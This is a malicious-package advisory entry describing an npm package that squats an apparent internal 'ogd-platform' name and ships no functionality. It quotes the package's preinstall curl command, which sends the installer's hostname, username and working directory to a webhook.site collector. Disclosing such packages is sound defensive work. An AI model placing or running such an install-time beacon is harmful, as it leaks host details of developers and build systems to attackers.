MAL-2026-5828

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931) The package contains only a package.json with a preinstall lifecycle script and ships no actual functionality despite advertising itself as an 'Open Government Data Platform core'. On `npm install`, the preinstall hook runs `curl --data-urlencode "info=$(hostname && whoami && pwd)"` against a webhook.site collector URL, sending the installer's hostname, username, and current working directory to an attacker-controlled endpoint. The empty tarball plus recon beacon is the canonical dependency-confusion / namespace-squat reconnaissance shape: an internal build expecting a private `ogd-platform` package would resolve to this public registry entry and leak host identifiers to the attacker on install.